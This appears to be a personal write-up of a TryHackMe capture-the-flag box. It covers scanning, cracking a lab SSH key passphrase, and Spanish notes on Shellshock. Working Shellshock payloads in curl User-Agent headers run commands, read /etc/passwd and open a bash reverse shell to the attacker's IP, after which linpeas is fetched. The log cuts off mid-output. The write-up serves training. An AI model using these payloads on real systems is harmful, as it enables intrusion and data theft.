0day

PreviousKubernetes for Everyone NextOsiris

Last updated 1 year ago

┌──(kali㉿kali)-[~/ra] └─$ rustscan -a 10.10.114.218 --ulimit 5500 -b 65535 -- -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Nmap? More like slowmap.🐢 [~] The config file is expected to be at "/home/kali/.rustscan.toml" [~] Automatically increasing ulimit value to 5500. [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers Open 10.10.114.218:22 Open 10.10.114.218:80 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. [~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-07 10:31 EST NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 10:31 Completed Parallel DNS resolution of 1 host. at 10:31, 0.02s elapsed DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 10:31 Scanning 10.10.114.218 [2 ports] Discovered open port 80/tcp on 10.10.114.218 Discovered open port 22/tcp on 10.10.114.218 Completed Connect Scan at 10:31, 0.19s elapsed (2 total ports) Initiating Service scan at 10:31 Scanning 2 services on 10.10.114.218 Completed Service scan at 10:31, 6.39s elapsed (2 services on 1 host) NSE: Script scanning 10.10.114.218. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 6.01s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 0.77s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 0.00s elapsed Nmap scan report for 10.10.114.218 Host is up, received user-set (0.18s latency). Scanned at 2023-01-07 10:31:08 EST for 14s PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 5720823c62aa8f4223c0b893996f499c (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAPcMQIfRe52VJuHcnjPyvMcVKYWsaPnADsmH+FR4OyR5lMSURXSzS15nxjcXEd3i9jk14amEDTZr1zsapV1Ke2Of/n6V5KYoB7p7w0HnFuMriUSWStmwRZCjkO/LQJkMgrlz1zVjrDEANm3fwjg0I7Ht1/gOeZYEtIl9DRqRzc1ZAAAAFQChwhLtInglVHlWwgAYbni33wUAfwAAAIAcFv6QZL7T2NzBsBuq0RtlFux0SAPYY2l+PwHZQMtRYko94NUv/XUaSN9dPrVKdbDk4ZeTHWO5H6P0t8LruN/18iPqvz0OKHQCgc50zE0pTDTS+GdO4kp3CBSumqsYc4nZsK+lyuUmeEPGKmcU6zlT03oARnYA6wozFZggJCUG4QAAAIBQKMkRtPhl3pXLhXzzlSJsbmwY6bNRTbJebGBx6VNSV3imwPXLR8VYEmw3O2Zpdei6qQlt6f2S3GaSSUBXe78h000/JdckRk6A73LFUxSYdXl1wCiz0TltSogHGYV9CxHDUHAvfIs5QwRAYVkmMe2H+HSBc3tKeHJEECNkqM2Qiw== | 2048 4c40db32640d110cef4fb85b739bc76b (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwY8CfRqdJ+C17QnSu2hTDhmFODmq1UTBu3ctj47tH/uBpRBCTvput1+++BhyvexQbNZ6zKL1MeDq0bVAGlWZrHdw73LCSA1e6GrGieXnbLbuRm3bfdBWc4CGPItmRHzw5dc2MwO492ps0B7vdxz3N38aUbbvcNOmNJjEWsS86E25LIvCqY3txD+Qrv8+W+Hqi9ysbeitb5MNwd/4iy21qwtagdi1DMjuo0dckzvcYqZCT7DaToBTT77Jlxj23mlbDAcSrb4uVCE538BGyiQ2wgXYhXpGKdtpnJEhSYISd7dqm6pnEkJXSwoDnSbUiMCT+ya7yhcNYW3SKYxUTQzIV | 256 f76f78d58352a64dda213c5547b72d6d (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKF5YbiHxYqQ7XbHoh600yn8M69wYPnLVAb4lEASOGH6l7+irKU5qraViqgVR06I8kRznLAOw6bqO2EqB8EBx+E= | 256 a5b4f084b6a78deb0a9d3e7437336516 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIItaO2Q/3nOu5T16taNBbx5NqcWNAbOkTZHD2TB1FcVg 80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu)) |_http-title: 0day | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD |_http-server-header: Apache/2.4.7 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:31 Completed NSE at 10:31, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds ┌──(kali㉿kali)-[~/ra] └─$ gobuster dir -u http://10.10.114.218 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -k -x txt,php,py,html =============================================================== Gobuster v3.3 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.114.218 [+] Method: GET [+] Threads: 64 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.3 [+] Extensions: php,py,html,txt [+] Timeout: 10s =============================================================== 2023/01/07 10:42:35 Starting gobuster in directory enumeration mode =============================================================== /.html (Status: 403) [Size: 285] /index.html (Status: 200) [Size: 3025] /cgi-bin (Status: 301) [Size: 315] [--> http://10.10.114.218/cgi-bin/] /img (Status: 301) [Size: 311] [--> http://10.10.114.218/img/] /uploads (Status: 301) [Size: 315] [--> http://10.10.114.218/uploads/] /admin (Status: 301) [Size: 313] [--> http://10.10.114.218/admin/] /css (Status: 301) [Size: 311] [--> http://10.10.114.218/css/] /js (Status: 301) [Size: 310] [--> http://10.10.114.218/js/] /backup (Status: 301) [Size: 314] [--> http://10.10.114.218/backup/] /robots.txt (Status: 200) [Size: 38] /secret (Status: 301) [Size: 314] [--> http://10.10.114.218/secret/] view-source:http://10.10.114.218/backup/ -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547 T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8 9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g /5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB 6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6 8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6 oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE 99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P -----END RSA PRIVATE KEY----- http://10.10.114.218/secret/ ┌──(kali㉿kali)-[~/0day_ctf] └─$ ssh2john id_rsa > hash ┌──(kali㉿kali)-[~/0day_ctf] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) No password hashes left to crack (see FAQ) ┌──(kali㉿kali)-[~/0day_ctf] └─$ john hash --show id_rsa:letmein 1 password hash cracked, 0 left a turtle (stego?) ┌──(kali㉿kali)-[~/snort] └─$ ls brooklyn99.jpg hash.txt passwd.txt shadow.txt SnortCheatsheetTryHackMe.pdf traffic-generator.sh turtle.png ┌──(kali㉿kali)-[~/snort] └─$ mv turtle.png ../0day_ctf ┌──(kali㉿kali)-[~/0day_ctf] └─$ file turtle.png turtle.png: PNG image data, 680 x 340, 8-bit/color RGBA, non-interlaced ┌──(kali㉿kali)-[~/0day_ctf] └─$ nikto -h 10.10.114.218 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.114.218 + Target Hostname: 10.10.114.218 + Target Port: 80 + Start Time: 2023-01-07 10:53:01 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.4.7 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Server may leak inodes via ETags, header found with file /, inode: bd1, size: 5ae57bb9a1192, mtime: gzip + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Uncommon header '93e4r0-cve-2014-6278' found, with contents: true + OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + OSVDB-3092: /admin/: This might be interesting... + OSVDB-3092: /backup/: This might be interesting... + OSVDB-3268: /css/: Directory indexing found. + OSVDB-3092: /css/: This might be interesting... + OSVDB-3268: /img/: Directory indexing found. + OSVDB-3092: /img/: This might be interesting... + OSVDB-3092: /secret/: This might be interesting... + OSVDB-3092: /cgi-bin/test.cgi: This might be interesting... Shellshock (https://www.sevenlayers.com/index.php/blog/125-exploiting-shellshock) Shellshock es una vulnerabilidad grave en el intérprete de comandos Bash que afecta a muchos sistemas operativos, incluyendo Linux y Mac OS X. La vulnerabilidad permite a un atacante ejecutar código arbitrario en el sistema afectado simplemente enviando una solicitud especialmente diseñada a un programa que use Bash. Un ejemplo de cómo explotar la vulnerabilidad podría ser el siguiente: supongamos que un sitio web tiene un formulario en el que los usuarios pueden ingresar una dirección de correo electrónico para recibir un mensaje de confirmación. Si un atacante envía una solicitud con un campo de dirección de correo electrónico especialmente diseñado (que incluye código Bash), ese código puede ser ejecutado por el sistema del sitio web. De esta manera, el atacante podría, por ejemplo, obtener acceso no autorizado a archivos sensibles del sistema. Es importante mencionar que la vulnerabilidad Shellshock fue corregida hace tiempo, por lo que es poco probable que un sistema actualmente soportado todavía sea vulnerable. Sin embargo, es importante asegurarse de mantener actualizados todos los sistemas y programas para protegerse contra vulnerabilidades similares en el futuro. testing 1. Primero, se define una variable de shell llamada "x" y se le asigna un valor. El valor de la variable es el siguiente: '() { :;}; echo VULNERABLE' 2. El valor de la variable comienza con un par de paréntesis vacíos seguidos de un espacio y una llave. Esto indica el inicio de una función de Bash. 3. Dentro de la función se define una etiqueta de fin de línea (:) seguida de una llave y un punto y coma (;). Esto es una función vacía, es decir, no hace nada. La etiqueta de fin de línea es importante porque indica el final de la función y permite que Bash interprete el resto del código como una serie de comandos sueltos en lugar de como una función. 4. Después de la función vacía viene una llave y un punto y coma (;}). Esto indica el final de la función. 5. Luego viene la instrucción "echo VULNERABLE". Esta instrucción muestra el mensaje "VULNERABLE" en la salida. El mensaje "VULNERABLE" es simplemente un ejemplo de cómo un atacante podría utilizar la vulnerabilidad Shellshock para ejecutar código malicioso. En lugar de "echo VULNERABLE", el atacante podría escribir cualquier otro comando que desee ejecutar en el sistema afectado. 6. Por último, se utiliza el comando "bash -c" para ejecutar el valor de la variable "x", es decir, el bloque de código malicioso. "bash -c" ejecuta una cadena de comandos especificada como argumento. En este caso, el argumento es el valor de la variable "x", que incluye el bloque de código malicioso. Si el sistema es vulnerable a Shellshock, el código malicioso será ejecutado y se mostrará el mensaje "VULNERABLE". ┌──(kali㉿kali)-[~/0day_ctf] └─$ x='() { :;}; echo VULNERABLE' bash -c : http://10.10.249.163/cgi-bin/test.cgi Hello World! https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi cgi-bin is a directory on a web server that is used to store Common Gateway Interface (CGI) scripts. These scripts are executed by the web server when a user requests a particular URL or web page that is associated with the script. The test.cgi file you mentioned is likely a CGI script written in a programming language such as Perl, Python, or C. It is executed by the web server when a user requests a web page or URL that is associated with the script. The purpose and functionality of the script will depend on the code that has been written by the script's creator. ┌──(kali㉿kali)-[~/0day_ctf] └─$ curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.249.163/cgi-bin/test.cgi uid=33(www-data) gid=33(www-data) groups=33(www-data) ┌──(kali㉿kali)-[~/0day_ctf] └─$ chmod 600 id_rsa ┌──(kali㉿kali)-[~/0day_ctf] └─$ ssh -i id_rsa www-data@10.10.249.163 Enter passphrase for key 'id_rsa': sign_and_send_pubkey: no mutual signature supported www-data@10.10.249.163's password: Permission denied, please try again. ┌──(kali㉿kali)-[~/0day_ctf] └─$ curl --help | grep "\-A" -A, --user-agent <name> Send User-Agent <name> to server ┌──(kali㉿kali)-[~/0day_ctf] └─$ curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.10.249.163/cgi-bin/test.cgi root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin revshell ┌──(kali㉿kali)-[~/0day_ctf] └─$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.8.19.103/1234 0>&1' http://10.10.249.163/cgi-bin/test.cgi ┌──(kali㉿kali)-[~/0day_ctf] └─$ rlwrap nc -lnvp 1234 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.249.163. Ncat: Connection from 10.10.249.163:33391. bash: cannot set terminal process group (878): Inappropriate ioctl for device bash: no job control in this shell www-data@ubuntu:/usr/lib/cgi-bin$ whoami whoami www-data www-data@ubuntu:/usr/lib/cgi-bin$ find / -type f -name flag.txt 2>/dev/null find / -type f -name flag.txt 2>/dev/null www-data@ubuntu:/usr/lib/cgi-bin$ cd /home cd /home www-data@ubuntu:/home$ ls ls ryan www-data@ubuntu:/home$ cd ryan cd ryan www-data@ubuntu:/home/ryan$ ls ls user.txt www-data@ubuntu:/home/ryan$ cat user.txt cat user.txt THM{Sh3llSh0ck_r0ckz} www-data@ubuntu:/home/ryan$ which python3 which python3 /usr/bin/python3 www-data@ubuntu:/home/ryan$ python3 -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@ubuntu:/home/ryan$ sudo -l sudo -l [sudo] password for www-data: letmein Sorry, try again. [sudo] password for www-data: Sorry, try again. [sudo] password for www-data: Sorry, try again. sudo: 3 incorrect password attempts www-data@ubuntu:/home/ryan$ find / -perm -4000 2>/dev/null | xargs ls -lah find / -perm -4000 2>/dev/null | xargs ls -lah -rwsr-xr-x 1 root root 31K Dec 16 2013 /bin/fusermount -rwsr-xr-x 1 root root 93K Jun 3 2014 /bin/mount -rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping -rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 37K Feb 16 2014 /bin/su -rwsr-xr-x 1 root root 68K Jun 3 2014 /bin/umount -rwsr-xr-x 1 root root 46K Feb 16 2014 /usr/bin/chfn -rwsr-xr-x 1 root root 41K Feb 16 2014 /usr/bin/chsh -rwsr-xr-x 1 root root 67K Feb 16 2014 /usr/bin/gpasswd -rwsr-xr-x 1 root root 74K Oct 21 2013 /usr/bin/mtr -rwsr-xr-x 1 root root 32K Feb 16 2014 /usr/bin/newgrp -rwsr-xr-x 1 root root 46K Feb 16 2014 /usr/bin/passwd -rwsr-xr-x 1 root root 152K Feb 10 2014 /usr/bin/sudo -rwsr-xr-x 1 root root 23K May 7 2014 /usr/bin/traceroute6.iputils -rwsr-xr-- 1 root messagebus 304K Jul 3 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10K Feb 25 2014 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 431K Mar 4 2019 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 11K Apr 12 2014 /usr/lib/pt_chown -rwsr-xr-- 1 root dip 336K Jan 22 2013 /usr/sbin/pppd -rwsr-sr-x 1 libuuid libuuid 19K Jun 3 2014 /usr/sbin/uuidd ┌──(kali㉿kali)-[~/0day_ctf] └─$ cp /home/kali/Downloads/linpeas.sh linpeas.sh ┌──(kali㉿kali)-[~/0day_ctf] └─$ ls hash id_rsa linpeas.sh turtle.png ┌──(kali㉿kali)-[~/0day_ctf] └─$ python3 -m http.server 1337 Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ... 10.10.249.163 - - [07/Jan/2023 22:43:23] "GET /linpeas.sh HTTP/1.1" 200 - www-data@ubuntu:/tmp$ wget http://10.8.19.103:1337/linpeas.sh wget http://10.8.19.103:1337/linpeas.sh --2023-01-07 19:43:23-- http://10.8.19.103:1337/linpeas.sh Connecting to 10.8.19.103:1337... connected. HTTP request sent, awaiting response... 200 OK Length: 777018 (759K) [text/x-sh] Saving to: 'linpeas.sh' 100%[======================================>] 777,018 393KB/s in 1.9s 2023-01-07 19:43:25 (393 KB/s) - 'linpeas.sh' saved [777018/777018] www-data@ubuntu:/tmp$ chmod +x linpeas.sh chmod +x linpeas.sh www-data@ubuntu:/tmp$ ./linpeas.sh ./linpeas.sh ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------| | Get latest LinPEAS : https://github.com/sponsors/carlospolop | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------/ linpeas-ng by carlospolop ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission. Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders... ╔═══════════════════╗ ═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════ ╚═══════════════════╝ OS: Linux version 3.13.0-32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data) Hostname: ubuntu Writable folder: /run/shm [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE ╔════════════════════╗ ════════════════════════════════════════╣ System Information ╠════════════════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits Linux version 3.13.0-32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 Distributor ID: Ubuntu Description: Ubuntu 14.04.1 LTS Release: 14.04 Codename: trusty ╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version Sudo version 1.8.9p5 ╔══════════╣ CVEs Check ./linpeas.sh: 1196: ./linpeas.sh: systemctl: not found ./linpeas.sh: 1197: ./linpeas.sh: [[: not found ./linpeas.sh: 1197: ./linpeas.sh: rpm: not found ./linpeas.sh: 1197: ./linpeas.sh: 0: not found ./linpeas.sh: 1207: ./linpeas.sh: [[: not found ╔══════════╣ PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ╔══════════╣ Date & uptime Sat Jan 7 19:44:03 PST 2023 19:44:03 up 33 min, 0 users, load average: 0.00, 0.01, 0.05 ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) disk ╔══════════╣ Unmounted file-system? ╚ Check if you can mount unmounted devices UUID=df519a5f-788a-4510-8e6c-4492ef33f232 / ext4 errors=remount-ro 0 1 UUID=13e22641-7ee1-41dd-9123-168df0e56f11 none swap sw 0 0 ╔══════════╣ Environment ╚ Any private information inside environment variables? HISTFILESIZE=0 SHLVL=2 OLDPWD=/home/ryan HTTP_ACCEPT=*/* HTTP_HOST=10.10.249.163 _=./linpeas.sh HISTSIZE=0 PWD=/tmp HISTFILE=/dev/null ╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found ╔══════════╣ Executing Linux Exploit Suggester ╚ https://github.com/mzet-/linux-exploit-suggester cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe [+] [CVE-2016-5195] dirtycow Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ] Download URL: https://www.exploit-db.com/download/40611 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: 